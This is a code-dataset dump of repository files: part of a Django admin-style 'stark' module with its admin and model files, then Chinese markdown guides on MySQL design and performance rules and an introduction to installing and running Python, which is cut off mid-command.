针对((),()),[[],[]]数据类型构建a标签\n\"\"\"class LinkTagGen(object):\n def __init__(self, data, filter_field, request):\n self.data = data\n self.filter_field = filter_field\n self.request = request\n\n def __iter__(self):\n current_id = self.request.GET.get(self.filter_field.filter_field_name, 0)\n params = copy.deepcopy(self.request.GET)\n params._mutable = True\n if params.get(self.filter_field.filter_field_name):\n del params[self.filter_field.filter_field_name]\n _url = \"%s?%s\" % (self.request.path_info, params.urlencode())\n yield mark_safe(\"<a href='%s'>全部</a>\" % _url)\n else:\n _url = \"%s?%s\" % (self.request.path_info, params.urlencode())\n yield mark_safe(\"<a href='%s' class='active'>全部</a>\" % _url)\n for item in self.data:\n if self.filter_field.filter_field_obj.choices:\n pk, text = str(item[0], item[1])\n elif isinstance(self.filter_field.filter_field_obj, ForeignKey) or \\\n isinstance(self.filter_field.filter_field_obj, ManyToManyField):\n pk, text = str(item.pk), item\n else:\n pk, text = item[1], item[1]\n params[self.filter_field.filter_field_name] = pk\n _url = \"%s?%s\" % (self.request.path_info, params.urlencode())\n if current_id == pk:\n link_tag = \"<a href='%s' class='active'>%s</a>\" % (_url, text)\n else:\n link_tag = \"<a href='%s'>%s</a>\" % (_url, text)\n yield mark_safe(link_tag)\"\"\"\n\n\n# 为每一个过滤的字段封装成整体类\nclass FilterField(object):\n def __init__(self, config, request):\n self.config = config\n self.request = request\n\n def get_data(self):\n if isinstance(self.filter_field_obj, ForeignKey) or isinstance(self.filter_field_obj, ManyToManyField):\n return self.filter_field_obj.related_model.objects.all()\n elif self.filter_field_obj.choices:\n return self.filter_field_obj.choices\n else:\n return self.config.model.objects.values_list(\"pk\", self.filter_field_name)\n\n def get_params(self):\n data = self.request.GET\n import copy\n params = copy.deepcopy(data)\n return params\n\n def get_filter_link(self):\n link_list = {}\n for filter_field_name in self.config.list_filter:\n self.filter_field_name = filter_field_name\n # 为什么放里面而不是放外面\n params = self.get_params()\n current_id = self.get_current_id()\n self.get_filter_field_obj()\n temp = self.get_link_list(params, current_id)\n link_list[filter_field_name] = temp\n return link_list\n\n def get_current_id(self):\n current_id = self.request.GET.get(self.filter_field_name, 0)\n return current_id\n\n def get_filter_field_obj(self):\n filter_field_obj = self.config.model._meta.get_field(self.filter_field_name)\n self.filter_field_obj = filter_field_obj\n\n def get_link_list(self, params, current_id):\n data_list = self.get_data()\n temp = []\n temp = self.deal_all_tag(params, temp)\n temp = self.deal_data_tag(params, data_list, current_id, temp)\n return temp\n\n def deal_data_tag(self, params, data_list, current_id, temp):\n for obj in data_list:\n pk, text, params = self.get_pk_text(params, obj)\n _url = params.urlencode()\n if current_id == str(pk) or current_id == text:\n link_tag = \"<a class='active' href='?%s'>%s</a>\" % (_url, text) # %s/%s/\n else:\n link_tag = \"<a href='?%s'>%s</a>\" % (_url, text) # %s/%s/\n temp.append(link_tag)\n return temp\n\n def get_pk_text(self, params, obj):\n if isinstance(self.filter_field_obj, ManyToManyField) or isinstance(self.filter_field_obj, ForeignKey):\n pk, text = obj.pk, str(obj)\n params[self.filter_field_name] = pk\n else:\n pk, text = obj\n params[self.filter_field_name] = text\n return pk, text, params\n\n def deal_all_tag(self, params, temp):\n if params.get(self.filter_field_name, None):\n del params[self.filter_field_name]\n temp.append(\"<a href='?%s'>全部</a>\" % (params.urlencode()))\n else:\n temp.append(\"<a class='active' href='?%s'>全部</a>\" % (params.urlencode()))\n return temp\n\n\nclass StarkSite(object):\n\n def __init__(self):\n self._registry = {}\n\n def register(self, model, stark_class=None, **options):\n if not stark_class:\n # 如果注册的时候没有自定义配置类,执行\n stark_class = ModelStark # 配置类\n\n # 降配置类对象加到_registry字典中,建立模型类\n self._registry[model] = stark_class(model, self) # _registry={'model':stark_class(model)}\n\n def get_urls(self):\n \"\"\"构造一层url\"\"\"\n temp = []\n for model, stark_class_obj in self._registry.items():\n # model:一个模型表\n # stark_class_obj:当前模型表相应的配置类对象\n model_name = model._meta.model_name\n app_label = model._meta.app_label\n # 分发增删改查url,问什么要是用stark_class_obj.urls_2,因为我们需要使用每个类定制的内容,如list_display\n # 如果将urls_2还是放入StarkSite中那么,每个模型的现实都是一样的,我们根本没有用到定制显示的参数\n temp.append(url(r\"^%s/%s/\" % (app_label, model_name), stark_class_obj.urls_2))\n \"\"\"\n path('app01/user/',UserConfig(User,site).urls2),\n path('app01/book/',ModelStark(Book,site).urls2),\n \"\"\"\n return temp\n\n @property\n def urls(self):\n return self.get_urls(), None, None\n\n\nsite = StarkSite()\n"
},
{
"alpha_fraction": 0.6546929478645325,
"alphanum_fraction": 0.6662803888320923,
"avg_line_length": 29.821428298950195,
"blob_id": "3ee9adc36b6ddbd14b2c974ca8440e17f9aff11d",
"content_id": "1dd9582431c31f61b9d2f99ca7e9ad3617beca52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 965,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 28,
"path": "/app01/admin.py",
"repo_name": "maxhope8/stark",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom app01.models import *\n\n\nclass BookConfig(admin.ModelAdmin):\n list_display = [\"nid\", \"title\", \"price\", \"publishDate\"] # 定制显示那些列,不能放多对多\n list_display_links = [\"title\"] # 查看链接\n # list_filter = [\"title\", \"publishDate\", \"authors\"] # 过滤\n list_editable = [\"price\"] # 编辑\n search_fields = [\"title\", \"price\"] # 搜索字段\n # date_hierarchy = \"publishDate\"\n fields = (\"title\",) # 限定现实的字段\n exclude = (\"\",) # 不显示哪些字段,和fields相反\n ordering = (\"nid\",) # 排序\n\n def patch_action(self, request, queryset):\n queryset.update(publishDate=\"2019-11-22\")\n\n patch_action.short_description = \"批量初始化\"\n actions = [patch_action]\n\n\nfrom django.contrib.admin.sites import AdminSite\n\nadmin.site.register(Book, BookConfig)\nadmin.site.register(Author)\nadmin.site.register(AuthorDetail)\nadmin.site.register(Publish)\n"
},
{
"alpha_fraction": 0.6351791620254517,
"alphanum_fraction": 0.6482084393501282,
"avg_line_length": 18.1875,
"blob_id": "5a5c03053146ad105b4769acb7c36c234f66db8b",
"content_id": "1ff8297b6f6ef7b4966d7862f4ae369eb728d738",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 307,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 16,
"path": "/starkapp/models.py",
"repo_name": "maxhope8/stark",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\nclass UserInfo(models.Model):\n name = models.CharField(max_length=32)\n age = models.IntegerField()\n\n def __str__(self):\n return self.name\n\n\nclass Book(models.Model):\n title = models.CharField(max_length=32)\n\n def __str__(self):\n return self.title\n"
}
] | 5 |
xiaofengyvan/PythonGuide
|
https://github.com/xiaofengyvan/PythonGuide
|
572c43abb970920d888d3885e6100ffdc184253e
|
437e8183c5ead3677669e239ab91a256d894dd3f
|
92be75f3e475991a0bea5ef5be9877387b8ae2ba
|
refs/heads/main
| 2023-08-22T15:36:10.134229 | 2021-05-15T04:45:01 | 2021-05-15T04:45:01 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7734770178794861,
"alphanum_fraction": 0.8043362498283386,
"avg_line_length": 14.89217758178711,
"blob_id": "9c249f75fce4136009d809571ba4360c38f1651c",
"content_id": "ad3df2681b95d6fbe97af8bdc24ce71af1826387",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 17308,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 473,
"path": "/docs/MySQL高性能优化规范建议.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# 数据库命令规范\n\n1. 所有数据库对象名称必须使用小写字母并用下划线分割\n2. 所有数据库对象名称禁止使用mysql保留关键字(如果表名中包含关键字查询时,需要将其用单引号括起来)\n3. 数据库对象的命名要能做到见名识意,并且最后不要超过32个字符\n4. 临时库表必须以tmp_为前缀并以日期为后缀,备份表必须以bak_为前缀并以日期(时间戳)为后缀\n5. 所有存储相同数据的列名和列类型必须一致(一般作为关联列,如果查询时关联列类型不一致会自动进行数据类型隐式转换,会造成列上的索引失效,导致查询效率降低)\n\n# 数据库基本设计规范\n\n## 1. 所有表必须使用Innodb存储引擎\n\n\n\n```\n没有特殊要求(即Innodb无法满足的功能如:列存储,存储空间数据等)的情况下,所有表必须使用Innodb存储引擎(mysql5.5之前默认使用Myisam,5.6以后默认的为Innodb)\nInnodb 支持事务,支持行级锁,更好的恢复性,高并发下性能更好\n```\n\n## 2. 数据库和表的字符集统一使用UTF8\n\n\n\n```\n兼容性更好,统一字符集可以避免由于字符集转换产生的乱码,不同的字符集进行比较前需要进行转换会造成索引失效,如果数据库中有存储emoji表情的需要,字符集需要采用utf8mb4字符集\n```\n\n## 3. 所有表和字段都需要添加注释\n\n\n\n```\n使用comment从句添加表和列的备注\n从一开始就进行数据字典的维护\n```\n\n## 4. 尽量控制单表数据量的大小,建议控制在500万以内\n\n500万并不是Mysql数据库的限制,过大会造成修改表结构,备份,恢复都会有很大的问题\n可以用历史数据归档(应用于日志数据),分库分表(应用于业务数据)等手段来控制数据量大小\n\n## 5. 谨慎使用Mysql分区表\n\n\n\n```\n分区表在物理上表现为多个文件,在逻辑上表现为一个表\n谨慎选择分区键,跨分区查询效率可能更低\n建议采用物理分表的方式管理大数据\n```\n\n## 6. 尽量做到冷热数据分离,减小表的宽度\n\n\n\n```\nMysql限制每个表最多存储4096列,并且每一行数据的大小不能超过65535字节\n\n减少磁盘IO,保证热数据的内存缓存命中率(表越宽,把表装载进内存缓冲池时所占用的内存也就越大,也会消耗更多的IO)\n更有效的利用缓存,避免读入无用的冷数据\n经常一起使用的列放到一个表中(避免更多的关联操作)\n```\n\n## 7. 禁止在表中建立预留字段\n\n\n\n```\n预留字段的命名很难做到见名识义\n预留字段无法确认存储的数据类型,所以无法选择合适的类型\n对预留字段类型的修改,会对表进行锁定\n```\n\n## 8. 禁止在数据库中存储图片,文件等大的二进制数据\n\n\n\n```\n通常文件很大,会短时间内造成数据量快速增长,数据库进行数据库读取时,通常会进行大量的随机IO操作,文件很大时,IO操作很耗时\n通常存储于文件服务器,数据库只存储文件地址信息\n```\n\n## 9. 禁止在线上做数据库压力测试\n\n## 10. 禁止从开发环境,测试环境直接连接生成环境数据库\n\n# 数据库字段设计规范\n\n## 1. 优先选择符合存储需要的最小的数据类型\n\n\n\n```\n原因是:列的字段越大,建立索引时所需要的空间也就越大,这样一页中所能存储的索引节点的数量也就越少也越少,在遍历时所需要的IO次数也就越多,\n索引的性能也就越差\n方法:\n```\n\n- 将字符串转换成数字类型存储,如:将IP地址转换成整形数据\n\nmysql提供了两个方法来处理ip地址\n\ninet_aton 把ip转为无符号整型(4-8位)\ninet_ntoa 把整型的ip转为地址\n\n插入数据前,先用inet_aton把ip地址转为整型,可以节省空间\n显示数据时,使用inet_ntoa把整型的ip地址转为地址显示即可。\n\n- 对于非负型的数据(如自增ID、整型IP)来说,要优先使用无符号整型来存储\n\n因为:无符号相对于有符号可以多出一倍的存储空间\nSIGNED INT -2147483648~2147483647\nUNSIGNED INT 0~4294967295\n\nVARCHAR(N)中的N代表的是字符数,而不是字节数\n使用UTF8存储255个汉字 Varchar(255)=765个字节\n\n过大的长度会消耗更多的内存\n\n## 2. 避免使用TEXT、BLOB数据类型,最常见的TEXT类型可以存储64k的数据\n\n- 建议把BLOB或是TEXT列分离到单独的扩展表中\n\nMysql内存临时表不支持TEXT、BLOB这样的大数据类型,如果查询中包含这样的数据,在排序等操作时,就不能使用内存临时表,必须使用磁盘临时表进行\n而且对于这种数据,Mysql还是要进行二次查询,会使sql性能变得很差,但是不是说一定不能使用这样的数据类型\n\n如果一定要使用,建议把BLOB或是TEXT列分离到单独的扩展表中,查询时一定不要使用select * 而只需要取出必要的列,不需要TEXT列的数据时不要对该列进行查询\n\n- TEXT或BLOB类型只能使用前缀索引\n\n因为MySQL对索引字段长度是有限制的,所以TEXT类型只能使用前缀索引,并且TEXT列上是不能有默认值的\n\n## 3. 避免使用ENUM类型\n\n修改ENUM值需要使用ALTER语句\nENUM类型的ORDER BY操作效率低,需要额外操作\n禁止使用数值作为ENUM的枚举值\n\n## 4. 尽可能把所有列定义为NOT NULL\n\n原因:\n索引NULL列需要额外的空间来保存,所以要占用更多的空间\n进行比较和计算时要对NULL值做特别的处理\n\n## 5. 使用TIMESTAMP(4个字节)或DATETIME类型(8个字节)存储时间\n\nTIMESTAMP 存储的时间范围 1970-01-01 00:00:01 ~ 2038-01-19-03:14:07\nTIMESTAMP 占用4字节和INT相同,但比INT可读性高\n超出TIMESTAMP取值范围的使用DATETIME类型存储\n\n经常会有人用字符串存储日期型的数据(不正确的做法)\n缺点1:无法用日期函数进行计算和比较\n缺点2:用字符串存储日期要占用更多的空间\n\n## 6. 同财务相关的金额类数据必须使用decimal类型\n\n- 非精准浮点:float,double\n- 精准浮点:decimal\n\nDecimal类型为精准浮点数,在计算时不会丢失精度\n占用空间由定义的宽度决定,每4个字节可以存储9位数字,并且小数点要占用一个字节\n可用于存储比bigint更大的整型数据\n\n# 索引设计规范\n\n## 1. 限制每张表上的索引数量,建议单张表索引不超过5个\n\n\n\n```\n索引并不是越多越好!索引可以提高效率同样可以降低效率\n\n索引可以增加查询效率,但同样也会降低插入和更新的效率,甚至有些情况下会降低查询效率\n\n因为mysql优化器在选择如何优化查询时,会根据统一信息,对每一个可以用到的索引来进行评估,以生成出一个最好的执行计划,如果同时有很多个\n索引都可以用于查询,就会增加mysql优化器生成执行计划的时间,同样会降低查询性能 \n```\n\n## 2. 禁止给表中的每一列都建立单独的索引\n\n\n\n```\n5.6版本之前,一个sql只能使用到一个表中的一个索引,5.6以后,虽然有了合并索引的优化方式,但是还是远远没有使用一个联合索引的查询方式好\n```\n\n## 3. 每个Innodb表必须有个主键\n\n\n\n```\nInnodb是一种索引组织表:数据的存储的逻辑顺序和索引的顺序是相同的\n每个表都可以有多个索引,但是表的存储顺序只能有一种\nInnodb是按照主键索引的顺序来组织表的\n\n不要使用更新频繁的列作为主键,不适用多列主键(相当于联合索引)\n不要使用UUID,MD5,HASH,字符串列作为主键(无法保证数据的顺序增长)\n主键建议使用自增ID值\n```\n\n# 常见索引列建议\n\n1. 出现在SELECT、UPDATE、DELETE语句的WHERE从句中的列\n\n2. 包含在ORDER BY、GROUP BY、DISTINCT中的字段\n\n 并不要将符合1和2中的字段的列都建立一个索引, 通常将1、2中的字段建立联合索引效果更好\n\n3. 多表join的关联列\n\n# 如何选择索引列的顺序\n\n\n\n```\n建立索引的目的是:希望通过索引进行数据查找,减少随机IO,增加查询性能 ,索引能过滤出越少的数据,则从磁盘中读入的数据也就越少\n```\n\n1. 区分度最高的放在联合索引的最左侧(区分度=列中不同值的数量/列的总行数)\n2. 尽量把字段长度小的列放在联合索引的最左侧(因为字段长度越小,一页能存储的数据量越大,IO性能也就越好)\n3. 使用最频繁的列放到联合索引的左侧(这样可以比较少的建立一些索引)\n\n# 避免建立冗余索引和重复索引(增加了查询优化器生成执行计划的时间)\n\n\n\n```\n重复索引示例:primary key(id)、index(id)、unique index(id)\n冗余索引示例:index(a,b,c)、index(a,b)、index(a)\n```\n\n# 对于频繁的查询优先考虑使用覆盖索引\n\n覆盖索引:就是包含了所有查询字段(where,select,ordery by,group by包含的字段)的索引\n\n覆盖索引的好处:\n\n1. 避免Innodb表进行索引的二次查询\n\nInnodb是以聚集索引的顺序来存储的,对于Innodb来说,二级索引在叶子节点中所保存的是行的主键信息,\n如果是用二级索引查询数据的话,在查找到相应的键值后,还要通过主键进行二次查询才能获取我们真实所需要的数据\n而在覆盖索引中,二级索引的键值中可以获取所有的数据,避免了对主键的二次查询 ,减少了IO操作,提升了查询效率\n\n1. 可以把随机IO变成顺序IO加快查询效率\n\n由于覆盖索引是按键值的顺序存储的,对于IO密集型的范围查找来说,对比随机从磁盘读取每一行的数据IO要少的多,\n因此利用覆盖索引在访问时也可以把磁盘的随机读取的IO转变成索引查找的顺序IO\n\n# 索引SET规范\n\n## 尽量避免使用外键约束\n\n不建议使用外键约束(foreign key),但一定要在表与表之间的关联键上建立索引\n外键可用于保证数据的参照完整性,但建议在业务端实现\n外键会影响父表和子表的写操作从而降低性能\n\n# 数据库SQL开发规范\n\n## 1. 建议使用预编译语句进行数据库操作\n\n\n\n```\n预编译语句可以重复使用这些计划,减少SQL编译所需要的时间,还可以解决动态SQL所带来的SQL注入的问题\n只传参数,比传递SQL语句更高效\n相同语句可以一次解析,多次使用,提高处理效率\n```\n\n## 2. 避免数据类型的隐式转换\n\n\n\n```\n隐式转换会导致索引失效\n如: select name,phone from customer where id = '111';\n```\n\n## 3. 充分利用表上已经存在的索引\n\n### 避免使用双%号的查询条件。\n\n如 a like '%123%',(如果无前置%,只有后置%,是可以用到列上的索引的)\n\n### 一个SQL只能利用到复合索引中的一列进行范围查询\n\n\n\n```\n如 有 a,b,c列的联合索引,在查询条件中有a列的范围查询,则在b,c列上的索引将不会被用到,\n在定义联合索引时,如果a列要用到范围查找的话,就要把a列放到联合索引的右侧\n```\n\n### 使用left join 或 not exists 来优化not in 操作\n\n\n\n```\n因为not in 也通常会使用索引失效\n```\n\n## 4. 数据库设计时,应该要对以后扩展进行考虑\n\n## 5. 程序连接不同的数据库使用不同的账号,进制跨库查询\n\n\n\n```\n为数据库迁移和分库分表留出余地\n降低业务耦合度\n避免权限过大而产生的安全风险\n```\n\n## 6. 禁止使用SELECT * 必须使用SELECT <字段列表> 查询\n\n\n\n```\n原因:\n 消耗更多的CPU和IO以网络带宽资源\n 无法使用覆盖索引\n 可减少表结构变更带来的影响\n```\n\n## 7. 禁止使用不含字段列表的INSERT语句\n\n\n\n```\n如: insert into values ('a','b','c');\n应使用 insert into t(c1,c2,c3) values ('a','b','c');\n```\n\n## 8. 避免使用子查询,可以把子查询优化为join操作\n\n\n\n```\n通常子查询在in子句中,且子查询中为简单SQL(不包含union、group by、order by、limit从句)时,才可以把子查询转化为关联查询进行优化\n\n子查询性能差的原因:\n\n 子查询的结果集无法使用索引,通常子查询的结果集会被存储到临时表中,不论是内存临时表还是磁盘临时表都不会存在索引,所以查询性能会受到一定的影响\n 特别是对于返回结果集比较大的子查询,其对查询性能的影响也就越大\n 由于子查询会产生大量的临时表也没有索引,所以会消耗过多的CPU和IO资源,产生大量的慢查询\n```\n\n## 9. 避免使用JOIN关联太多的表\n\n\n\n```\n对于Mysql来说,是存在关联缓存的,缓存的大小可以由join_buffer_size参数进行设置\n在Mysql中,对于同一个SQL多关联(join)一个表,就会多分配一个关联缓存,如果在一个SQL中关联的表越多,\n所占用的内存也就越大\n\n如果程序中大量的使用了多表关联的操作,同时join_buffer_size设置的也不合理的情况下,就容易造成服务器内存溢出的情况,\n就会影响到服务器数据库性能的稳定性\n\n同时对于关联操作来说,会产生临时表操作,影响查询效率\nMysql最多允许关联61个表,建议不超过5个\n```\n\n## 10. 减少同数据库的交互次数\n\n\n\n```\n数据库更适合处理批量操作\n合并多个相同的操作到一起,可以提高处理效率\n```\n\n## 11. 对应同一列进行or判断时,使用in代替or\n\n\n\n```\nin 的值不要超过500个\nin 操作可以更有效的利用索引,or大多数情况下很少能利用到索引\n```\n\n## 12. 禁止使用order by rand() 进行随机排序\n\n\n\n```\n会把表中所有符合条件的数据装载到内存中,然后在内存中对所有数据根据随机生成的值进行排序,并且可能会对每一行都生成一个随机值,如果满足条件的数据集非常大,\n就会消耗大量的CPU和IO及内存资源\n推荐在程序中获取一个随机值,然后从数据库中获取数据的方式\n```\n\n## 13. WHERE从句中禁止对列进行函数转换和计算\n\n\n\n```\n对列进行函数转换或计算时会导致无法使用索引\n\n不推荐:\nwhere date(create_time)='20190101'\n推荐:\nwhere create_time >= '20190101' and create_time < '20190102'\n```\n\n## 14. 在明显不会有重复值时使用UNION ALL 而不是UNION\n\n\n\n```\nUNION 会把两个结果集的所有数据放到临时表中后再进行去重操作\nUNION ALL 不会再对结果集进行去重操作\n```\n\n## 15. 拆分复杂的大SQL为多个小SQL\n\n\n\n```\n大SQL:逻辑上比较复杂,需要占用大量CPU进行计算的SQL\nMySQL 一个SQL只能使用一个CPU进行计算\nSQL拆分后可以通过并行执行来提高处理效率\n```\n\n# 数据库操作行为规范\n\n## 超100万行的批量写(UPDATE、DELETE、INSERT)操作,要分批多次进行操作\n\n### 1. 大批量操作可能会造成严重的主从延迟\n\n主从环境中,大批量操作可能会造成严重的主从延迟,大批量的写操作一般都需要执行一定长的时间,\n而只有当主库上执行完成后,才会在其他从库上执行,所以会造成主库与从库长时间的延迟情况\n\n### 2. binlog日志为row格式时会产生大量的日志\n\n大批量写操作会产生大量日志,特别是对于row格式二进制数据而言,由于在row格式中会记录每一行数据的修改,我们一次修改的数据越多,\n产生的日志量也就会越多,日志的传输和恢复所需要的时间也就越长,这也是造成主从延迟的一个原因\n\n### 3. 避免产生大事务操作\n\n大批量修改数据,一定是在一个事务中进行的,这就会造成表中大批量数据进行锁定,从而导致大量的阻塞,阻塞会对MySQL的性能产生非常大的影响\n特别是长时间的阻塞会占满所有数据库的可用连接,这会使生产环境中的其他应用无法连接到数据库,因此一定要注意大批量写操作要进行分批\n\n## 对于大表使用pt-online-schema-change修改表结构\n\n1. 避免大表修改产生的主从延迟\n2. 避免在对表字段进行修改时进行锁表\n\n对大表数据结构的修改一定要谨慎,会造成严重的锁表操作,尤其是生产环境,是不能容忍的\n\npt-online-schema-change它会首先建立一个与原表结构相同的新表,并且在新表上进行表结构的修改,然后再把原表中的数据复制到新表中,并在原表中增加一些触发器\n把原表中新增的数据也复制到新表中,在行所有数据复制完成之后,把新表命名成原表,并把原来的表删除掉\n把原来一个DDL操作,分解成多个小的批次进行\n\n## 禁止为程序使用的账号赋予super权限\n\n\n\n```\n当达到最大连接数限制时,还运行1个有super权限的用户连接\nsuper权限只能留给DBA处理问题的账号使用\n```\n\n## 对于程序连接数据库账号,遵循权限最小原则\n\n\n\n```\n程序使用数据库账号只能在一个DB下使用,不准跨库\n程序使用的账号原则上不准有drop权限\n```\n\n> 原文链接:https://www.cnblogs.com/huchong/p/10219318.html\n>\n> 作者:**[听风。](https://www.cnblogs.com/huchong/p/10219318.html)**\n\n"
},
{
"alpha_fraction": 0.6654024124145508,
"alphanum_fraction": 0.7209908962249756,
"avg_line_length": 18.395402908325195,
"blob_id": "12461153d35f3bb5654527f507a540fb42e6e5db",
"content_id": "39169f3099b0113c766d69766b902d60135fac99",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 15255,
"license_type": "permissive",
"max_line_length": 366,
"num_lines": 435,
"path": "/Python基础连载/认识Python.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:认识Python\n\n## 认识Python\n\n> 本章目录:\n\n+ Python简介-历史/优缺点\n+ 搭建编程环境\n+ 第一个Python程序\n+ 注释\n\n#### Python起源\n\n1. 1989 年的圣诞节期间,吉多·范罗苏姆为了在阿姆斯特丹打发时间,决心开发一个新的**解释程序**,作为 ABC 语言的一种继承(**感觉下什么叫牛人**)\n2. ABC 是由吉多参加设计的一种教学语言,就吉多本人看来,ABC 这种语言非常优美和强大,是**专门为非专业程序员设计的**。但是 ABC 语言并没有成功,究其原因,吉多认为是**非开放**造成的。吉多决心在 Python 中避免这一错误,并获取了非常好的效果\n3. 之所以选中 Python(蟒蛇) 作为程序的名字,是因为他是 BBC 电视剧——蒙提·派森的飞行马戏团(Monty Python's Flying Circus)的爱好者\n4. 1991 年,第一个 Python **解释器** 诞生,它是用 C 语言实现的,并能够调用 C 语言的库文件\n\n> 在这里我们要去了解一下什么是解析器\n\n\n\n- **编译型语言**:程序在执行之前需要一个专门的编译过程,把程序编译成为机器语言的文件,运行时不需要重新翻译,直接使用编译的结果就行了。程序执行效率高,依赖编译器,跨平台性差些。如 C、C++\n- **解释型语言**:解释型语言编写的程序不进行预先编译,以文本方式存储程序代码,会将代码一句一句直接运行。在发布程序时,看起来省了道编译工序,但是在运行程序的时候,必须先解释再运行\n\n#### 编译型语言和解释型语言对比\n\n- **速度** —— 编译型语言比解释型语言执行速度快\n- **跨平台性** —— 解释型语言比编译型语言跨平台性好\n\n#### Python的特点\n\n- Python 是\n\n 完全面向对象的语言\n\n - **函数**、**模块**、**数字**、**字符串**都是对象,**在 Python 中一切皆对象**\n - 完全支持继承、重载、多重继承\n - 支持重载运算符,也支持泛型设计\n\n- Python **拥有一个强大的标准库**,Python 语言的核心只包含 **数字**、**字符串**、**列表**、**字典**、**文件** 等常见类型和函数,而由 Python 标准库提供了 **系统管理**、**网络通信**、**文本处理**、**数据库接口**、**图形系统**、**XML 处理** 等额外的功能\n\n- Python 社区提供了**大量的第三方模块**,使用方式与标准库类似。它们的功能覆盖 **科学计算**、**人工智能**、**机器学习**、**Web 开发**、**数据库接口**、**图形系统** 多个领域\n\n#### Python的优缺点\n\nPython的优点很多,简单的可以总结为以下几点。\n\n1. 简单明了,学习曲线低,比很多编程语言都容易上手。\n2. 开放源代码,拥有强大的社区和生态圈,尤其是在数据分析和机器学习领域。\n3. 解释型语言,天生具有平台可移植性,代码可以工作于不同的操作系统。\n4. 对两种主流的编程范式(面向对象编程和函数式编程)都提供了支持。\n5. 代码规范程度高,可读性强,适合有代码洁癖和强迫症的人群。\n\nPython的缺点主要集中在以下几点。\n\n1. 执行效率稍低,对执行效率要求高的部分可以由其他语言(如:C、C++)编写。\n2. 代码无法加密,但是现在很多公司都不销售卖软件而是销售服务,这个问题会被弱化。\n3. 在开发时可以选择的框架太多(如Web框架就有100多个),有选择的地方就有错误。\n\n#### Python的应用领域\n\nPython在Web应用后端开发、云基础设施建设、DevOps、网络数据采集(爬虫)、自动化测试、数据分析、机器学习等领域都有着广泛的应用。\n\n#### 搭建编译环境\n\n> 介绍一下Python有什么解释器\n\n**Python 的解释器** 如今有多个语言的实现,包括:\n\n- `CPython` —— 官方版本的 C 语言实现\n- `Jython` —— 可以运行在 Java 平台\n- `IronPython` —— 可以运行在 .NET 和 Mono 平台\n- `PyPy` —— Python 实现的,支持 JIT 即时编译\n\n### 交互式运行 Python 程序\n\n- 直接在终端中运行解释器,而不输入要执行的文件名\n- 在 Python 的 `Shell` 中直接输入 **Python 的代码**,会立即看到程序执行结果\n\n#### 1) 交互式运行 Python 的优缺点\n\n##### 优点\n\n- 适合于学习/验证 Python 语法或者局部代码\n\n##### 缺点\n\n- 代码不能保存\n- 不适合运行太大的程序\n\n#### Windows环境\n\n> 安装\n\n\n\n首先,检查你的系统是否安装了Python。为此,在“开始”菜单中输入command 并按回车以打开一个命令窗口;你也可按住Shift键并右击桌面,再选择“在此处打开命令窗口”。在终 \n\n端窗口中输入python并按回车;如果出现了Python提示符(>>> ),就说明你的系统安装了Python。然而,你也可能会看到一条错误消息,指出python 是无法识别的命令。 \n\n如果是这样,就需要下载Windows Python安装程序。为此,请访问http://python.org/downloads/ 。你将看到两个按钮,分别用于下载Python 3和Python 2。单击用于下载Python 3的按 \n\n钮,这会根据你的系统自动下载正确的安装程序。下载安装程序后,运行它。请务必选中复选框Add Python to PATH(如图1-2所示),这让你能够更轻松地配置系统。 \n\n\n\n\n\n如果系统显示api-ms-win-crt*.dll文件缺失,可以参照[《api-ms-win-crt*.dll缺失原因分析和解决方法》](https://zhuanlan.zhihu.com/p/32087135)一文讲解的方法进行处理或者直接在[微软官网](https://www.microsoft.com/zh-cn/download/details.aspx?id=48145)下载Visual C++ Redistributable for Visual Studio 2015文件进行修复;如果是因为更新Windows的DirectX之后导致某些动态链接库文件缺失问题,可以下载一个[DirectX修复工具](https://dl.pconline.com.cn/download/360074-1.html)进行修复。\n\n**2.** 启动Python终端\n\n通过配置系统,让其能够在终端会话中运行Python,可简化文本编辑器的配置工作。打开一个命令窗口,并在其中执行命令python 。如果出现了Python提示符(>>> ),就说明 \n\nWindows找到了你刚安装的Python版本。 \n\n#### Linux环境\n\nLinux环境自带了Python 2.x版本,但是如果要更新到3.x的版本,可以在[Python的官方网站](https://www.python.org/)下载Python的源代码并通过源代码构建安装的方式进行安装,具体的步骤如下所示(以CentOS为例)。\n\n1. 安装依赖库(因为没有这些依赖库可能在源代码构件安装时因为缺失底层依赖库而失败)。\n\n```\nyum -y install wget gcc zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel gdbm-devel db4-devel libpcap-devel xz-devel libffi-devel\n```\n\n1. 下载Python源代码并解压缩到指定目录。\n\n```\nwget https://www.python.org/ftp/python/3.7.6/Python-3.7.6.tar.xz\nxz -d Python-3.7.6.tar.xz\ntar -xvf Python-3.7.6.tar\n```\n\n1. 切换至Python源代码目录并执行下面的命令进行配置和安装。\n\n```\ncd Python-3.7.6\n./configure --prefix=/usr/local/python37 --enable-optimizations\nmake && make install\n```\n\n1. 修改用户主目录下名为.bash_profile的文件,配置PATH环境变量并使其生效。\n\n```\ncd ~\nvim .bash_profile\n# ... 此处省略上面的代码 ...\n\nexport PATH=$PATH:/usr/local/python37/bin\n\n# ... 此处省略下面的代码 ...\n```\n\n1. 激活环境变量。\n\n```\nsource .bash_profile\n```\n\n#### macOS环境\n\nmacOS也自带了Python 2.x版本,可以通过[Python的官方网站](https://www.python.org/)提供的安装文件(pkg文件)安装Python 3.x的版本。默认安装完成后,可以通过在终端执行`python`命令来启动2.x版本的Python解释器,启动3.x版本的Python解释器需要执行`python3`命令。\n\n### 运行Python程序\n\n#### 确认Python的版本\n\n可以Windows的命令行提示符中键入下面的命令。\n\n```\npython --version\n```\n\n\n\n在Linux或macOS系统的终端中键入下面的命令。\n\n```\npython3 